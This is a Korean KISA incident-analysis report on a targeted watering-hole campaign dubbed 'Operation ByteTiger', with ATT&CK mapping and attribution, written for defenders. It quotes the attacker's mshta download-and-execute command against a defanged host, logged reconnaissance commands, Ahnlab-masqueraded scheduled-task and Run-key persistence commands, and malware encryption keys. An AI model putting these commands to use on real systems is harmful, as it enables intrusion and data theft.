##### www.kisa.or.kr

# TTPs#6 타겟형 워터링홀 공격전략 분석


-----

##### 1. Introduction

 2. Summary


## Contents

##### 03

 04


##### 3. ATT&CK Matrix

 4. Attribution

 5. Conclusion


##### 07

 24

 29


본 보고서의 내용에 대해 진흥원의 허가 없이 무단전재 및
복사를 금하며, 위반 시 저작권법에 저촉될 수 있습니다.


집  필

종합분석팀: 김동욱 선임, 이슬기 선임, 이태우 선임, 이재광 팀장

사고분석팀: 윤지노 선임, 윤민아 주임, 김광연 팀장

감  수

신대규 본부장, 임진수 단장


-----

### 타겟형 워터링홀 공격전략 분석


## 1. Introduction

해킹 사고가 지속 발생함에 따라 보안 요구 사항은 점점 더 까다로워지고 있으며 방어 시스템의 기능은 매우 높은 수준으로
발전하고 있다. 그렇지만, 과거의 침해사고들이 현재에도 여전히 발생하고 있으며, 방어 체계를 잘 갖춘 기업도 전혀 예외가
아니다.

사이버보안에서 유명한 고통의 피라미드(The Pyramid of Pain)는 방어자가 TTP(Tactic, Technique, Procedure)와 같은 공격자의
전략과 전술, 그리고 그 과정을 이해하고 방어 체계를 운영하는 것이 가장 효과적임을 잘 표현하고 있다. 보안은 공격자를
Tough!한 단계로 끌고 가는 것이다.

고통의 피라미드, David J Bianco

여전히, IoC(Indicator of Compromise, 악성IP - 악성 도메인 등 단순 지표) 기반의 방어 체계는 매우 유용하다. 다만, 공격자는
단순 지표와 관련된 공격 인프라를 쉽게 확보하고 버린다.

TTP는 다르다. 공격자는 TTP를 쉽게 확보하거나 버릴 수 없다. 타깃이 정해진 공격자는 타깃의 방어 환경을 무력화하기 위해 많은
시간을 들여서 TTP를 학습하고 연습한다. 그리고, 확보된 TTP를 지속 활용할 수 있는 대상들이 새로운 타깃이 된다.

공격자의 TTP는 언제나 방어 환경의 특성과 맞물려 있다. 그래서, 방어자는 방어 환경에 대해 정확히 이해하고 있어야 하며,
공격의 흐름과 과정을 패턴이나 기법이 아닌 전략 전술 관점으로 보아야 한다. 방어자의 환경과 공격자의 TTP는 함께 이야기
되어야 한다.

TTP를 이해한 방어자는 '공격자의 TTP가 방어자 환경에 유효한 것인지' 여부와, '유효하다면 TTP를 무력화할 수 있는 방어 전략은
무엇인지' 등 2가지를 설명할 수 있어야 한다.

한국인터넷진흥원(이하 KISA)은 침해사고 대응 과정을 통해 공격자의 TTP를 파악하고 있으며, 그 과정 및 대응방안을 ATT&CK
Framework[1] 기반으로 작성하여 배포한다. 보고서에 포함되어 있는 TTP와 관련된 다양한 흔적들(Artifacts)은 TTP에 대한 이해를
돕는 보조 수단일 뿐이다.

1 실제 공격에 사용된 전술 및 기술과 그에 대한 대응방안을 나타낸 매트릭스

|Int|roducti|
|---|---|


-----

### 타겟형 워터링홀 공격전략 분석


## 2. Summary

최근, 국내 주요 기업의 홈페이지에 악성 스크립트를 삽입해 특정 타겟만을 대상으로

악성코드를 다운로드 받아 실행시키는 타겟형 워터링 홀 공격이 확인되고 있다.

공격자는 공격대상이 접속할 만한 홈페이지에 악성 스크립트를 삽입했고,

해당사이트를 방문 시 취약점을 통해 악성코드를 감염, 원격제어 행위를 수행했다.

해당 침해사고 대응 과정에서 알려지지 않았던 2개의 신규 악성코드를 발견하였다.

침해사고 조사 과정에서 확인된 2종의 신규 악성코드는 종합분석팀에서 개발한 AI

프로파일링 분석시스템인 FENS 시스템을 통해 기존에 그룹화된 악성코드 들과 신규

수집된 2종 악성코드의 코드 및 메타데이터 등에서 연관 정보를 확인할 수 있었다.

※ FENS(Feature Engineering Normalization System) : 악성코드, 악성앱, 피해시스템 로그 등에서 자동 추출된 특징 정보 약 230여개를

AI 분석, 프로파일링 기술을 통해 고위험 침해사고 식별 및 연관성 분석에 활용하는 분석관리 시스템

이번 TTP 보고서에서는 워터링홀을 통한 최초 침투 방법과 신규 확인된 2종의 악성코드를 통한 원격제어부터 유출까지의

과정에서 확인된 공격 전략과 FENS시스템을 통해 기존 그룹화된 악성코드들과의 유사성 정보에 관해 확인해 보며, 나아가

Kaspersky와 Malwarebytes의 보고서에서 확인된 악성코드들에서 확인된 특징을 비교해 본다.

신규 확인된 악성코드 중 하나는 C2와 명령 송수신 시 “Tiger”라는 식별자를 사용했다. 우리는 이 악성코드의 명령에서

사용된 문자열 ‘Tiger’ 인용해 호랑이의 공격이란 의미로 이번 보고서에 담을 침해사고의 TTP에 대한 부제를 “Operation

Byte(Bite)Tiger” 명명한다.

※ 본 보고서에서는 편의상 두 악성코드에게 임의의 명칭을 사용한다. 침해사고에서 확인되 악성코드의 최종 행위에 따라

다운로더 악성코드는 TigerDownloader, 원격제어를 수행하는 악성코드는 TigerRat 이라 한다.

|.|Summary|
|---|---|


-----

공격 개요도

- 각 번호를 클릭하면 해당 상세 내용으로 연결됩니다.


### 타겟형 워터링홀 공격전략 분석


-----

### 타겟형 워터링홀 공격전략 분석


정찰단계에서 공격자는 공격 대상을 선정하는 작업을 수행한다. 기법이 확인되지는 않았으나, 워터링홀 공격 대상의 아이피

필터링을 위해 정찰단계에서 공격 대상의 아이피를 수집한 것으로 보인다.

##### 2 자원 개발

공격에 활용할 인프라를 구축하는 단계이다. 정보유출, 명령 제어 등을 위해 기존에 노출되지 않은 인프라를 확보한다. 일부

기업의 서버를 탈취하거나 호스팅 및 도메인을 가상자산을 통해 임대하고 공격에 필요한 악성코드를 직접 제작하여 사용한다.

##### 3 최초 침투

정찰단계에서 수집한 정보 및 공격 자원을 확보한 후 침투를 시도한다. 최초 침투를 위해 타겟형 워터링홀 공격을 수행했으며,

이 과정에서 기존에 수집한 정보를 바탕으로 감염대상을 필터링한다. 또, 목표 기업이 사용 중인 소프트웨어의 취약점을 통해

악성코드를 다운로드받아 감염시킨다.

##### 4 실  행

목표 기업이 사용 중인 소프트웨어의 취약점을 통해 공격자의 서버에서 악성코드를 다운로드받아 실행시킨다.

##### 5 지속성 유지

원격제어 악성코드의 원격 명령기능(CMD Command)를 이용해 레지스트리와 스케줄러에 원격제어 악성코드를 등록시켜

지속성을 유지한다.

##### 6 방어 회피

공격자는 Windows 정상 유틸리티인 mshta.exe를 악용해 악성코드를 다운로드받고 실행시킨다. 또한, 설치된 악성코드는

정상 프로그램명으로 설치되었으며, 설치경로 역시 실제 사용되는 경로에 설치되었으며, 백신, 보안장비 등의 탐지 우회를

악성코드가 사용하는 문자들 등을 모두 인코딩했다.

##### 7 탐  색

악성코드는 감염 시 감염대상의 시스템 정보를 수집해 공격자의 명령제어지로 수집한 정보를 전달한다.

##### 8 수  집

원격제어 악성코드를 통해 감염 시스템에서 키로깅, 스크린 캡처 기능을 통한 현재 피해 시스템의 상황을 수집하고, CMD

명령 등의 기능을 이용해 피해 시스템의 정보 및 사용자 파일 등의 다양한 정보를 수집한다.

##### 9 유  출

수집한 정보는 외부로 유출하였으며, 유출시 수집한 정보를 인코딩해 공격자의 서버로 전달한다.


-----

|TT|&CK M|
|---|---|


### 타겟형 워터링홀 공격전략 분석


###### Reconnaissance


## 3. ATT&CK Matrix

###### Defense Evasion


T1590.005 Gather Victim Network Information

###### Resource Development

T1583.003 Acquire Infrastructure

T1584.004 Compromise Infrastructure

T1587.001 Develop Capabilities

T1608.004 Stage Capabilities

###### Initial Access

T1189 Drive-by Compromise

###### Execution

T1203 Exploitation for Client Execution

T1059 Command and Scripting Interpreter

###### Persistence

T1547.001 Boot or Logon Autostart Executio

T1053.005 Scheduled Task/Job


T1218.005 Signed Binary Proxy Execution

T1036.005 Masquerading

T1140 Deobfuscate/Decode Files or Information

###### Discovery

T1033 System Owner/User Discovery

###### Collection

T1560.002 Archive Collected Data

T1119 Automated Collection

T1005 Data from Local System

T1056.001 Input Capture

T1113 Screen Capture

###### Command and Control

T1071.001 Application Layer Protocol

T1132.001 Data Encoding

T1573.001 Encrypted channel

###### Exfiltration

T1041 Exfiltration Over C2 Channel


-----

### 타겟형 워터링홀 공격전략 분석


##### 1 Reconnaissance : 정찰

###### 1. T1590.005 Gather Victim Network Information: IP Addresses

 - 격대상의 아이피 정보를 수집해 워터링홀 공격시 아이피 필터링에 활용

|Reconnaissance : 정찰 T1590.005 Gather Victim Network Information: IP Addresses|Col2|Col3|Col4|Col5|Col6|
|---|---|---|---|---|---|
|||||||


##### 1


-----

### 타겟형 워터링홀 공격전략 분석


##### 2


 - 격자의 명령제어 서버 운용을 위해 공격자 서버를 가상 사설 서버(아마존) 등록

C2

52.202.XX.XX

34.221.XX.XX

###### 2. T1584.004 Compromise Infrastructure: Server

 - 사 서버를 장악하고 악성 스크립트를 삽입해 공격에 활용

 - 비스 중인 웹페이지에 한 줄 스크립트를 삽입해 특정 사이트로 연결되도록 유도


-----

### 타겟형 워터링홀 공격전략 분석


###### 3. T1587.001 Develop Capabilities: Malware

 - 격자는 공격 수행을 위해 신규 악성코드 2종을 개발

명칭 파일명 해시 최종 기능(목적)

TigerDownloader iexplore.exe f0ff67d4d34fe34d52a44b3515c44950 추가 파일 다운로드 및 실행

lsdev.exe

TigerRAT msdev.exe 4df757390adf71abdd084d3e9718c153 원격제어

ASDCli.exe

###### 4. T1587.004 Develop Capabilities: Exploits

 - 성코드를 실행하기위해 특정 소프트웨어의 취약점 탐색 및 개발

 - 정 소프트웨어의 취약점을 통해 mshta.exe 실행해 악성파일 다운로드 및 실행

취약점을 이용한 공격 이력

C:\Program Files(x86)\Unidocs\ezPDFReader2.0G\../../../Windows/System32/mshta.exe “hxxp://34.221.66.xx/
page.html” /print

###### 5. T1608.004 Stage Capabilities: Drive-by Target

 - 워터링홀 페이지에 접속한 경우 공격 대상의 아이피를 필터링 하고 공격대상만 특정 사이트로 리다이렉트 하도록 악성

스크립트를 제작

|명칭|파일명|해시|최종 기능(목적)|
|---|---|---|---|
|TigerDownloader|iexplore.exe|f0ff67d4d34fe34d52a44b3515c44950|추가 파일 다운로드 및 실행|
|TigerRAT|lsdev.exe msdev.exe ASDCli.exe|4df757390adf71abdd084d3e9718c153|원격제어|


-----

### 타겟형 워터링홀 공격전략 분석


- 정 웹사이트에 접속 시 악성코드 유포 사이트로 연결되도록 추가 코드 삽입

- 해자는 특정 사이트 방문 및 취약점을 통해 악성코드 감염

[ 워터링홀 시작점 ] hxxps://www.xxxxx.re.kr

[ 스크립트 실행 ] hxxps://gw.xxxx.com/mobile/schedule/ScheduleReg.jsp

[ 취약점 악용 ] hxxps://gw.xxxx.com/mobile/schedule/1.res


-----

### 타겟형 워터링홀 공격전략 분석


- 정 소프트웨어의 취약점을 통해 mshta.exe 실행해 악성파일 다운로드 및 실행

- 당 프로그램의 권한(사용자 권한)으로 악성코드 실행

- age.html을 통해 TigerDownloader 악성코드 설치 및 실행

프로그램 로그(ezPDFWSLauncher.log)에서 나타난 공격 이력

|05/25/2021, 10:40:36 ▶ 악성코드 실행시간 05/25/2021, 10:40:36 05/25/2021, 10:40:36 05/25/2021, 10:40:36 05/25/2021, 10:40:36 05/25/2021, 10:40:36 05/25/2021, 10:40:36 CreateProcessAsUser, sid = 1, pid = xxxxx|05/26/2021, 10:23:00 ▶ 악성코드 실행시간 05/26/2021, 10:23:00 05/26/2021, 10:23:00 05/26/2021, 10:23:00 05/26/2021, 10:23:00 05/26/2021, 10:23:00 05/26/2021, 10:23:00 CreateProcessAsUser, sid = 1, pid = xxxxx|
|---|---|

|Date|DST IP|DST Port|URL|비고|
|---|---|---|---|---|
|2021-05-25 10:40 ~ 15:22|34.221.66.xx (Amazon)|80|hxxp://34.221.66.xx/page.html|다운로드|
||||hxxp://34.221.66.xx/lsdev.exe||
||||hxxp://34.221.66.xx/StSess_Update.php|명령실행|
||||hxxp://34.221.66.xx/ASDClient.php||


-----

### 타겟형 워터링홀 공격전략 분석


###### 2. T1059: Command and Scripting Interpreter – Windows Command Shell

 - indows Command Shell을 통해 명령 수행

프로세스 부모 프로세스 명령어

mshta.exe ezPDFWSLauncher.exe "mshta.exe" "hxxp://34.221.66.xx/page.html" /print

cmd.exe /c ipconfig /all

cmd.exe /c tasklist

cmd.exe /c netstat -naop tcp

cmd.exe /c systeminfo

cmd.exe /c fsutil fsinfo drives

iexplore.exe mshta.exe

cmd.exe /c dir c:\*

cmd.exe /c dir d:\*

cmd.exe /c dir z:\*

cmd.exe /c c:\users\public\lsdev.exe

cmd.exe /c c:\users\public\Pictures\msdev.exe

cmd.exe /c "net use"

cmd.exe /c "ipconfig /all"

cmd.exe /c "whoami"

cmd.exe /c "reg query

lsdev.exe cmd.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

cmd.exe /c "tasklist"

cmd.exe /c "whoami"

cmd.exe /c "schtasks /create /tn "Ahnlab\ASDClient" /tr

"C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /sc daily /st <Time> /ru <Account>

cmd.exe /c "reg add

HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v

AhnlabClient /t REG_SZ /d "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /f"

cmd.exe /c "whoami /s"

cmd.exe /c "whoami /?"

cmd.exe /c "whoami /user"

msdev.exe cmd.exe

cmd.exe /c "wind.exe <Azure-AD SID>

cmd.exe /c "wind.exe"

cmd.exe /c "net use"

cmd.exe /c "whoami"

cmd.exe /c "del /f wind.exe"

cmd.exe /c "net view <IP>"

|프로세스|부모 프로세스|명령어|
|---|---|---|
|mshta.exe|ezPDFWSLauncher.exe|"mshta.exe" "hxxp://34.221.66.xx/page.html" /print|
|iexplore.exe|mshta.exe|cmd.exe /c ipconfig /all cmd.exe /c tasklist cmd.exe /c netstat -naop tcp cmd.exe /c systeminfo cmd.exe /c fsutil fsinfo drives cmd.exe /c dir c:\* cmd.exe /c dir d:\* cmd.exe /c dir z:\* cmd.exe /c c:\users\public\lsdev.exe cmd.exe /c c:\users\public\Pictures\msdev.exe|
|lsdev.exe|cmd.exe|cmd.exe /c "net use" cmd.exe /c "ipconfig /all" cmd.exe /c "whoami" cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" cmd.exe /c "tasklist" cmd.exe /c "whoami" cmd.exe /c "schtasks /create /tn "Ahnlab\ASDClient" /tr "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /sc daily /st <Time> /ru <Account>|
|msdev.exe|cmd.exe|cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AhnlabClient /t REG_SZ /d "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /f" cmd.exe /c "whoami /s" cmd.exe /c "whoami /?" cmd.exe /c "whoami /user" cmd.exe /c "wind.exe <Azure-AD SID> cmd.exe /c "wind.exe" cmd.exe /c "net use" cmd.exe /c "whoami" cmd.exe /c "del /f wind.exe" cmd.exe /c "net view <IP>"|


-----

### 타겟형 워터링홀 공격전략 분석


###### 1. T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

 2. T1053.005 Scheduled Task/Job: Scheduled Task

 - 케줄러 및 레지스트리 등록을 통해 지속적인 악성코드 실행

스케줄러 등록

schtasks /create /tn “Ahnlab\ASDClient” /tr “C:\ProgramData\Ahnlab\AIS\ASDCli.exe” /sc daily /st <Time> /ru <Account>

레지스트리 등록

HKCU\Software\Microsoft\Windopws\CurrentVersion\Run /v AhnlabClient /t REG_SZ /d

“C:\ProgramData\Ahnlab\AIS\ASDCli.exe” /f


-----

### 타겟형 워터링홀 공격전략 분석


  - shta.exe(Windows 유틸리티를)를 악용하여 악성 .hta 파일 및 Javascript 또는 VBScript의 실행

취약점을 이용한 공격 이력

C:\Program Files(x86)\Unidocs\ezPDFReader2.0G\../../../Windows/System32/mshta.exe “hxxp://34.221.66.xx/page.html”

/print

###### 2. T1036.005 Masquerading: Match Legitimate Name or Location

 - 파일은 iexplore.exe 등과 같은 정상 프로그램의 파일명으로 생성되며, 정상 프로그램이 사용하는 디렉토리 경로에

악성 파일 저장

취약점을 이용한 공격 이력

C:\Program Files(x86)\Unidocs\ezPDFReader2.0G\../../../Windows/System32/mshta.exe “hxxp://34.221.66.xx/page.html”

/print

이름 경로 Hash(MD5) 기능

iexplore.exe C:\users\public\ f0ff67d4d34fe34d52a44b3515c44950 명령조종

lsdev.exe C:\users\public\

명령조종,

msdev.exe C:\users\public\picture\ 4df757390adf71abdd084d3e9718c153 정보유출,

키로거

ASDCli.exe C:\ProgramData\Ahnlab\AIS\

|이름|경로|Hash(MD5)|기능|
|---|---|---|---|
|iexplore.exe|C:\users\public\|f0ff67d4d34fe34d52a44b3515c44950|명령조종|
|lsdev.exe|C:\users\public\|4df757390adf71abdd084d3e9718c153|명령조종, 정보유출, 키로거|
|msdev.exe|C:\users\public\picture\|||
|ASDCli.exe|C:\ProgramData\Ahnlab\AIS\|||


-----

### 타겟형 워터링홀 공격전략 분석


###### 3. T1140 Deobfuscate/Decode Files or Information

 - 사용된 악성코드는 공통적으로 16바이트 키 값으로 데이터를 XOR한 이후 Base64로 인코딩

 - 악성코드는 문자열과 IAT정보가 인코딩 되어 있으며, Base64와 RC4 알고리즘 등을 통해 악성코드가 사용할 문자열 및

악성코드 구성 데이터를 복호화

|Col1|TigerDownloader|TigerRAT|
|---|---|---|
|1st stage 복호화|16byte key XOR & Base64||
|문자열 복호화|Base64 & RC4|DES 알고리즘|
|IAT 정보 복호화|Base64 & RC4|DES 알고리즘|
|C2 통신|Base64 & RC4|RC4|
|키 값|Base64 색인 값 1: A-Za-z0-9+/= Base64 색인 값 2: A-Za-z0-9#$= RC4 키 값 : 0123456789ABCDEF|DES Key : 728DE941A2348BD2 RC4 Key1 : DE42BE46EAB9CDFC5CE3066426C1FA1F RC4 Key2 : 739F5574809658F2AD548A57D420AAB1|


-----

### 타겟형 워터링홀 공격전략 분석


- TigerDownloader는 감염된 시스템의 기기의 시스템, 유저정보, 네트워크 정보 등을 수집해 공격자의 C2에 전달하며,

이때 수집한 정보는 Base64로 인코딩


-----

### 타겟형 워터링홀 공격전략 분석


 - 집한 내용 중 일부 정보는 zlib를통해 암호 압축해 전송

###### 2. T1119 Automated Collection

 - TigerDownloader는 악성코드 실행 시 유저정보, 컴퓨터이름, 어댑터(ip,mac) 정보 등의 시스템 정보를 자동으로

수집하고 C2로 전달


##### 8


-----

### 타겟형 워터링홀 공격전략 분석


###### 3. T1005 Data from Local System

 4. T1056.001 Input Capture: Keylogging

 5. T1113 Screen Capture

 - TigerRAT 악성코드는 악성코드의 기능 중 시스템의 디렉토리 검색, 파일 검색, 키로깅, 스크린 캡처 기능 등을 이용해

감염된 시스템에서 파일 및 정보를 수집 및 송신할 수 있으며, 명령을 받아 행위를 수행

 - TigerDownloader 악성코드는 5개의 명령을 수행이 가능하며 각 수행 명령에 따라 응답 값(Tiger102, Tiger103) 전달

TigerRAT 악성코드 기능 분석 개요도

TigerDownloader 악성코드 기능 분석표


-----

### 타겟형 워터링홀 공격전략 분석


- TigerDownloader와 TigerRAT은 모두 명령 서버와 통신 시 HTTP 프로토콜을 사용

TigerDonwnloader HTTP 데이터

TigerDonwnloader 동작 과정


##### 9


-----

### 타겟형 워터링홀 공격전략 분석


TigerRAT HTTP 데이터

TigerRAT 동작 과정

TigerRAT Hashing Algorithm


-----

### 타겟형 워터링홀 공격전략 분석


###### 2. T1132.001Data Encoding: Standard Encoding 

 - TigerDownloader 악성코드는 명령 송수신 시 데이터를 Base64 알고리즘을 통해 인코딩후 전달하며,

사용되는 색인값을 변경해서 사용

TigherDownloader Base64 색인 값

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789#$=

###### 3. T1573.001 Encrypted channel: Symmetric Cryptography

 - TigerRAT 악성코드는 명령 송수신 시 데이터를 RC4 알고리즘을 통해 암호화

TigerRAT RC4 알고리즘


-----

### 타겟형 워터링홀 공격전략 분석


- TigerDownloader 악성코드는 명령제어서버와 통신 시 HTTP 통신을 통해 명령을 송수신 받으며 각 명령 상황에 맞게

식별자를 사용

- TigerDownloader 악성코드는 파일 송신 시 고정헤더를 이용하며, Content-type을 이미지 파일로 위장

- TigerRAT 악성코드는 명령제어서버로 파일, 키로깅정보, 스크립 캡처 정보 등을 유출

Identificator

Tiger101 Send Victiom info

Tiger102 Recv Command

Tiger103 File Upload

TigerDownloader 악성코드 고정헤더

TigerRAT 악성코드가 유출한 데이터 크기

|Col1|Identificator|
|---|---|
|Tiger101|Send Victiom info|
|Tiger102|Recv Command|
|Tiger103|File Upload|


##### 10


-----

### 타겟형 워터링홀 공격전략 분석


## 4. Attribution

최근 국내에서 발생하고 있는 공격(유사 공격)그룹에 의해 발생한 침해사고 사례의 TTP를 살펴보면 공격의 최종 목표와

목적이 동일하더라도 최초 침투를 위한 공격 기법은 각 기업의 환경에 따라 변화하고 있다. 이는 공격그룹이 가지고 있는

기술(Techniques)을 활용하기 위해 기업의 환경에 맞게 전략과 절차(Tactics, Procedures)를 변화해 공격대상에 맞게 다양한

방법으로 공격을 시도하고 있음을 나타낸다.

[보고서에서 공개한 두 악성코드(다운로더, 원격제어)는 새로 제작된 것으로 보이나, 기존에 공개된 Kaspersky와 Malwarebytes](https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/)

두 보고서에서 확인된 TTP(악성코드 생성 경로, 사용된 취약점, 명령 송수신 시의 특징)에서 유사한 공격 전략과 기술 등이

사용된 점을 확인할 수 있었다.

이번 장에서는 신규 확인된 2종의 악성코드의 특징과 기존에 공개된 TTP와의 유사성을 비교 분석해 연관 관계를 확인한다.

공격 개요도

|A|ttributio|
|---|---|


-----

### 타겟형 워터링홀 공격전략 분석


- 아래는 KISA의 고유 시스템인 FENS를 통해 위 두 보고서(Kaspersky, Malwarebytes)내 기재된 악성코드와 KISA에서

수집한 악성코드, 그리고 Operation ByteTiger에서 사용된 악성코드의 유사성을 확인한 결과이다.

- 이미지에서 나타나는 유사성은 악성코드의 특징정보를 추출하고 그 정보를 나타낸 관계로 코드 블록, 리치헤더,

SectionMD5, 함수 유사성 등을 통해 각 샘플군 간의 관계를 보여준다.

|Col1|악성코드 특징정보 일부|
|---|---|
|Code Block|악성코드를 함수 단위로 해시값을 비교해 함수 간 유사도를 보여줌|
|RichHeader|악성코드를 컴파일(생성)한 환경정보가 담겨있는 헤더 영역의 정보|
|SectionMD5|악성코드간 섹션 데이터의 해시값을 비교해 유사도를 보여줌|
|C2|악성코드가 사용하는 공격자의 도메인 및 IP(클래스) 유사도 분석|


-----

### 타겟형 워터링홀 공격전략 분석


###### 2. mshta를 통한 악성코드(hta, html)실행 방법

 - 특정 프로그램의 취약점을 이용해 mshta를 실행시키고, mshta프로그램을 통해 악성 hta(html)파일을 실행해 악성코드를

동작시킨다.

###### 3. 악성코드가 디코딩되어 메모리에 로드되는 방법

 - 신규 확인된 2종의 악성코드 모두 실제 악성행위를 하는 코드는 악성코드 내부에 인코딩 되어 저장되어있었으며,

이를 메모리에 로드할 때 BASE64로 디코딩하고, 16바이트 키 값을 통해 XOR해 메모리에 로드한다.

###### 4. 자가삭제 스크립트

 - TigerRAT악성코드에서 확인된 자가 삭제 스크립트(.bat) 파일의 코드가 기존에 다른 악성코드에서 사용된 코드와

동일하게 작성되었다.


-----

### 타겟형 워터링홀 공격전략 분석


###### 5. 명령 결과를 이미지 파일 등으로 위장해 전송

 - 좌측의 악성코드는 명령결과 파일명을 test.gif로 이미지 파일과 같이 생성해 C2서버의 image폴더로 전달하였으며,

우측(ByteTiger)의 악성코드는 명령 결과 전달시 Content-Type을 이미지로 지정하였으며, 명령 결과를 C2서버의

image폴더 하위에 동일하게 전달한다.

###### 6. 하드 코딩된 문자열 전송

 - 악성코드는 명령제어 서버와 통신을 위해 특정 값과 하드코딩된 문자열을 전달한다. 이때 전달되는 값과 원격제어 행위

정상 동작을 위해 수신받는 값을 비교한 내용이다.

Operation ByteTiger Kaspersky Report

하드코딩된 송신 값 HTTP 1.1 /indax.php?member=sbi2009 SSL3.3.7. HTTP 1.1 /member.php SSL3.4

정상 수신 데이터 HTTP 1.1 200 ok SSL2.1 HTTP 1.1 200 ok SSL2.1

###### 7. 악성코드 설치 경로

 - 악성코드 설치경로 및 악성코드의 이름이 정상 파일명과 사용자가 사용하는 폴더 등의 경로를 이용해 마치 정상

파일처럼 위장해 설치되었다.

|Col1|Operation ByteTiger|Kaspersky Report|
|---|---|---|
|하드코딩된 송신 값|HTTP 1.1 /indax.php?member=sbi2009 SSL3.3.7.|HTTP 1.1 /member.php SSL3.4|
|정상 수신 데이터|HTTP 1.1 200 ok SSL2.1|HTTP 1.1 200 ok SSL2.1|

|설치경로 및 악성코드명|C:\users\public\iexplore.exe C:\users\public\lsdev.exe C:\users\public\picture\msdev.exe C:\ProgramData\Ahnlab\AIS\ASDCli.exe|
|---|---|


-----

### 타겟형 워터링홀 공격전략 분석


###### 8. 공격자가 사용한 실제 커맨드 명령어

 - 공격자가 악성코드를 사용한 CMD명령 로그이며, 일부 명령어 사용방법(인자값)에서 공격그룹의 특징을 확인할 수 있다.

프로세스 부모 프로세스 명령어

mshta.exe ezPDFWSLauncher.exe "mshta.exe" "hp://34.221.66.xx/page.html" /print

cmd.exe /c ipconfig /all

cmd.exe /c tasklist

cmd.exe /c netstat -naop tcp

cmd.exe /c systeminfo

cmd.exe /c fsutil fsinfo drives

iexplore.exe mshta.exe

cmd.exe /c dir c:\*

cmd.exe /c dir d:\*

cmd.exe /c dir z:\*

cmd.exe /c c:\users\public\lsdev.exe

cmd.exe /c c:\users\public\Pictures\msdev.exe

cmd.exe /c "net use"

cmd.exe /c "ipconfig /all"

cmd.exe /c "whoami"

cmd.exe /c "reg query

lsdev.exe cmd.exe HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

cmd.exe /c "tasklist"

cmd.exe /c "whoami"

cmd.exe /c "schtasks /create /tn "Ahnlab\ASDClient" /tr

"C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /sc daily /st <Time> /ru <Account>

cmd.exe /c "reg add

HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v

AhnlabClient /t REG_SZ /d "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /f"

cmd.exe /c "whoami /s"

cmd.exe /c "whoami /?"

cmd.exe /c "whoami /user"

msdev.exe cmd.exe

cmd.exe /c "wind.exe <Azure-AD SID>

cmd.exe /c "wind.exe"

cmd.exe /c "net use"

cmd.exe /c "whoami"

cmd.exe /c "del /f wind.exe"

cmd.exe /c "net view <IP>"

|프로세스|부모 프로세스|명령어|
|---|---|---|
|mshta.exe|ezPDFWSLauncher.exe|"mshta.exe" "hp://34.221.66.xx/page.html" /print|
|iexplore.exe|mshta.exe|cmd.exe /c ipconfig /all cmd.exe /c tasklist cmd.exe /c netstat -naop tcp cmd.exe /c systeminfo cmd.exe /c fsutil fsinfo drives cmd.exe /c dir c:\* cmd.exe /c dir d:\* cmd.exe /c dir z:\* cmd.exe /c c:\users\public\lsdev.exe cmd.exe /c c:\users\public\Pictures\msdev.exe|
|lsdev.exe|cmd.exe|cmd.exe /c "net use" cmd.exe /c "ipconfig /all" cmd.exe /c "whoami" cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" cmd.exe /c "tasklist" cmd.exe /c "whoami" cmd.exe /c "schtasks /create /tn "Ahnlab\ASDClient" /tr "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /sc daily /st <Time> /ru <Account>|
|msdev.exe|cmd.exe|cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AhnlabClient /t REG_SZ /d "C:\ProgramData\Ahnlab\AIS\ASDCli.exe" /f" cmd.exe /c "whoami /s" cmd.exe /c "whoami /?" cmd.exe /c "whoami /user" cmd.exe /c "wind.exe <Azure-AD SID> cmd.exe /c "wind.exe" cmd.exe /c "net use" cmd.exe /c "whoami" cmd.exe /c "del /f wind.exe" cmd.exe /c "net view <IP>"|


-----

### 타겟형 워터링홀 공격전략 분석


## 5. Conclusion

|C|onclusio|
|---|---|


#### Security Incident Responder’s Insight

‘한국인터넷진흥원’은 본 보고서를 통해 타겟형 워터링홀 공격으로 악성코드 감염, 정보유출을 수행하는 공격그룹의

TTP를 살펴봤다.

공격자는 공격 전에 서비스를 통한 서버자원을 확보하고 서드파티 프로그램에 대한 취약점 연구를 선행하였다. 이후

공격대상이 빈번하게 접속하는 사이트에 악성 스크립트 및 익스플로잇을 삽입해 타겟형 워터링홀 공격을 수행한다.

사이트 접속시 선별된 공격 대상에게만 악성코드를 설치하였으며 특정 소프트웨어의 취약점을 이용해 실행시켰다.

실행된 악성코드는 감염된 시스템에 추가 악성코드 다운로드 후 내부자료 중요 자료를 선별·탈취했다.

이 과정에서 확인된 주요 특징 중 하나는 기존에 알려진 악성코드가 아닌 신규 악성코드를 제작해 공격을 수행했다는

것이며, 해당 악성코드의 특징 및 유사도를 분석한 결과 기존에 다른 특정 그룹의 악성코드와의 유사성을 확인할

수 있었다. 이는 해당 공격그룹이 신규 악성코드를 제작해 사용하였지만, 악성코드의 TTP는 크게 바뀌지 않았다는

것이다. 기존에 한국인터넷진흥원 TTP 보고서에서 확인된 것처럼 새로운 전략과 기술을 구축하고 공격에

사용하기에는 오랜 시간이 걸리기 때문에 공격자의 TTP는 쉽게 변하지 않는다.

또한, 이번에 한국인터넷진흥원에서 확인한 공격 기법은 타겟형 워터링홀 공격을 통한 침투이었으나,

외부보고서에서는 스피어피싱을 통한 공격이었다. 이는 공격자가 피해기업 환경에 맞추어 TTP를 변화해 가며 공격을

수행한다는 것을 말해준다.

이처럼 공격자는 공격 대상에 맞는 침투 방법, 소프트웨어 취약점 탐색, 그리고 신규 악성코드를 개발해 가며 여러

기업을 공격하고 있다.

